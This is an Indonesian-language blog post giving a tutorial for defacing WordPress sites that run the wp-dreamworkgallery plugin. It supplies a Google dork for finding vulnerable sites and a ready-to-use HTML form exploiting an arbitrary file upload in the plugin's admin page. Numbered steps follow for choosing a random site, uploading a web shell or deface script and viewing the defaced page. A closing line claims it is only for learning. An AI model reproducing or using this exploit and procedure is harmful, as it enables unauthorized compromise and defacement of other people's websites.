hello friend
kali ini gua mau share tutor deface wp-theme-dreamworkgallery
oke langsung ea
bahan
1. dork : inurl:/wp-content/plugins/wp-dreamworkgallery/ kembangin biar dapet fresh and ferawan
2. csrf :
<form action="http:/target/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"> <input type="hidden" name="task" value="drm_add_new_album" /> <input type="hidden" name="album_name" value="Arbitrary File Upload" /> <input type="hidden" name="album_desc" value="Arbitrary File Upload" /> <input type="file" name="album_img" value="" />
<input type="submit" value="HAJAR!" /> </form>
copy ni csrf via notepad kalo udah simpen dengan extensi html
langkah :
1.dorking gugel
2.pilih salah satu site nya
3.copy site masukin ke csrf nih di sini
4. simpan lagi csrf nya, trusss buka csrf nya lewat web browser ntar keluar tampilan kek gini
nah di sini lah kita upload shell/script deface kita
5.upload deh shell /script nya
6.kalo udah berhasil tampilanya kek gini ada letak file upload an kita
7.kalo mau liat hasil deface nya tinggal copy letak file yg kita upload
8. nah trus tekan enter taraaa berhasil kan
kalo kurang jelas bisa liat video ini
oke sekian dulu tutor dari saya, ini cuma buat pembelajaran aja yaaa kalo ada apa2 saya gak bertanggung jawab see you
thanks to BERANDAL
Tidak ada komentar:
Posting Komentar